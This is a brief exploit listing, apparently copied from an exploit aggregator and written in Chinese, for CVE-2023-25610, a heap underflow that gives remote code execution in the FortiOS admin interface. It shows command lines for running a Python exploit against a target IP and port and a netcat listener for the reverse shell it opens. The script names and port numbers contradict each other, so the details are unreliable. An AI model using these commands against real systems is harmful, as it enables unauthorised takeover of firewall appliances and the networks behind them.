Share
## https://sploitus.com/exploit?id=76B7057A-7383-50C9-AE93-8211298C01F0
# CVE-2023-25610

FortiOS 管理界面中的堆内存下溢导致远程代码执行。

# 范围和限制

1. Fortinet 6.x
2. 基于 TLSv1.3,在其他 TLS 版本上可能存在差异

# 用法

python3 cve-2022-42475.py rhost rport lhost 'command'

```
python3 CVE-2023-25610.py 192.168.10.1 8443 10.10.1.1 'ls -la /'
```

# Listener

EXP 使用 python 命令在端口 31337 上设置反弹 shell

```
nc -lvnp 31226
```